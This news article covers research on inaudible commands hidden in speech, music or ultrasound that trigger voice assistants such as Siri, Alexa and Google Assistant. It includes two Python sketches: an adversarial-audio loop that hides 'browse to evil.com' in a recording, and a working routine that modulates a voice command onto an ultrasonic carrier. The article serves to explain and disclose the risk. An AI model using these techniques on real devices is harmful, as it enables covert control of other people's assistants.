UC Berkeley researchers reveal that stealthy commands can be picked up by popular voice assistants.
Voice-based assistants such as Siri and Alexa are becoming a much more common feature in the average household. While many espouse their virtues in terms of accessibility and convenience, there are security issues that researchers have been exploring over the past several years.
The idea that voice assistants can be exploited or fooled is by no means new, and many stories have surfaced revealing potential and hypothetical exploit situations involving your typical at-home assistant device.
The New York Times reported that researchers in the US and China can now demonstrate the ability to send disguised commands, undetectable to the human ear, to voice assistants. Working in laboratory conditions, the teams used several methods to secretly activate the AI systems on smart speakers and smartphones, making them open websites or dial phone numbers.
The details published this month build on a previous successful experiment conducted by students from the University of California (UC) Berkeley and Georgetown University in 2016. It showed how commands could be hidden in white noise played over loudspeakers or through YouTube videos to manipulate smart devices.
Building on that earlier work, this year's research found that commands could be embedded directly into spoken sentences or pieces of recorded music.
By manipulating Mozilla’s DeepSpeech speech-to-text software, the researchers were able to hide the command ‘OK Google, browse to evil.com’ in a recording of the spoken sentence ‘Without the dataset, the article is useless.’ The embedded command is undetectable to the human ear.
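The general technique at work here is an adversarial-example optimisation against a speech-to-text model: a tiny perturbation is added to a benign recording and tuned until the model transcribes the attacker’s phrase, while staying too quiet for a listener to notice. The Python sketch below illustrates that loop only in outline; the ToySpeechModel, the hide_command function and all of the parameters are illustrative stand-ins, not the researchers’ actual code or DeepSpeech’s API.

```python
# Minimal sketch of a hidden-command audio attack: optimise a small
# perturbation so that a (toy) speech-to-text model transcribes an
# attacker-chosen phrase, while the perturbation stays very quiet.
import string
import torch
import torch.nn as nn

ALPHABET = " " + string.ascii_lowercase            # classes 1..27; 0 is the CTC blank
char_to_idx = {c: i + 1 for i, c in enumerate(ALPHABET)}

class ToySpeechModel(nn.Module):
    """Hypothetical stand-in for a real speech-to-text network such as DeepSpeech."""
    def __init__(self, frame_len=320, n_classes=len(ALPHABET) + 1):
        super().__init__()
        self.frame_len = frame_len
        self.proj = nn.Linear(frame_len, n_classes)

    def forward(self, audio):
        # Split the waveform into fixed-size frames and emit per-frame
        # character logits shaped (time, batch, classes) for CTC.
        frames = audio.view(1, -1, self.frame_len)
        return self.proj(frames).permute(1, 0, 2)

def hide_command(audio, target_text, model, steps=500, lr=1e-3, max_pert=0.005):
    """Optimise a bounded perturbation so `model` transcribes `target_text`."""
    target = torch.tensor([[char_to_idx[c] for c in target_text]])
    delta = torch.zeros_like(audio, requires_grad=True)
    opt = torch.optim.Adam([delta], lr=lr)
    ctc = nn.CTCLoss(blank=0)
    for _ in range(steps):
        logits = model(audio + delta)                       # (T, 1, C)
        log_probs = logits.log_softmax(dim=-1)
        input_lens = torch.tensor([logits.shape[0]])
        target_lens = torch.tensor([target.shape[1]])
        loss = ctc(log_probs, target, input_lens, target_lens)
        opt.zero_grad()
        loss.backward()
        opt.step()
        # Keep the perturbation quiet so the original sentence dominates.
        with torch.no_grad():
            delta.clamp_(-max_pert, max_pert)
    return (audio + delta).detach()

# Example: a one-second clip at 16kHz standing in for the benign recording.
model = ToySpeechModel()
benign = torch.randn(16000) * 0.1
adversarial = hide_command(benign, "ok google browse to evil dot com", model)
```

Keeping the perturbation’s peak amplitude tiny is what makes the change hard to hear in this sketch; the published attacks use more careful distortion constraints, but the optimisation principle is the same.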
Nicholas Carlini, a PhD student at UC Berkeley, said the team wanted to make the commands even more stealthy, adding: “My assumption is that the malicious people already employ people to do what I do.”
Researchers in China last year demonstrated that ultrasonic transmissions could trigger popular voice assistants such as Siri or Alexa, in a method known as ‘DolphinAttack’.
This attack required the perpetrator to be within whispering distance of the device, but further studies have since shown that attacks like this could be amplified and carried out from as far as 25ft away.
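The published description of DolphinAttack is that the voice command is amplitude-modulated onto an ultrasonic carrier above the range of human hearing, and the non-linearity of the target device’s microphone demodulates it back into the audible band. The sketch below shows only that modulation step, assuming hypothetical input and output file names and a 25kHz carrier; it illustrates the principle rather than reproducing the researchers’ tooling.

```python
# Sketch of a DolphinAttack-style modulation step: amplitude-modulate a
# recorded voice command onto an ultrasonic carrier so humans hear nothing,
# while a microphone's non-linearity can demodulate the envelope.
import numpy as np
from scipy.io import wavfile

OUTPUT_RATE = 192_000   # output sample rate high enough to represent ultrasound
CARRIER_HZ = 25_000     # carrier above the ~20kHz limit of human hearing

def modulate_command(command_wav, output_wav, depth=1.0):
    """Amplitude-modulate a recorded voice command onto an ultrasonic carrier."""
    rate, voice = wavfile.read(command_wav)          # assumes a mono recording
    voice = voice.astype(np.float64)
    peak = np.max(np.abs(voice))
    if peak > 0:
        voice /= peak                                # normalise to [-1, 1]

    # Resample the command to the ultrasonic-capable output rate.
    n_out = int(len(voice) * OUTPUT_RATE / rate)
    voice = np.interp(
        np.linspace(0, len(voice), n_out, endpoint=False),
        np.arange(len(voice)),
        voice,
    )

    # Classic AM: the command becomes sidebands around the 25kHz carrier,
    # leaving nothing in the audible band for a human to hear.
    t = np.arange(n_out) / OUTPUT_RATE
    carrier = np.sin(2 * np.pi * CARRIER_HZ * t)
    signal = (1.0 + depth * voice) * carrier
    signal /= np.max(np.abs(signal))

    wavfile.write(output_wav, OUTPUT_RATE, (signal * 32767).astype(np.int16))

# Hypothetical usage:
# modulate_command("ok_google_command.wav", "ultrasonic_command.wav")
```

Playing such a file back also requires speaker and amplifier hardware that can reproduce ultrasonic frequencies, which is one reason the original attack only worked at whispering distance.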
Carlini noted that the aim was to show manufacturers and companies that this type of exploit is possible. Makers of these devices have not ruled out the possibility of such attacks happening in future, but Apple, Amazon and Google have responded to the research by pointing to the security risk mitigation measures they already have in place.
Google pointed to Voice Match, which can stop the assistant from acting on requests relating to sensitive subjects unless it recognises the user’s voice, though this protects against only a limited number of potential scenarios. Amazon, meanwhile, offers a PIN code option for making voice purchases.
With companies scaling up their commitments to voice assistant technologies – such as the new Duplex software debuted at the recent Google I/O conference – potential exploitation is something to keep in mind.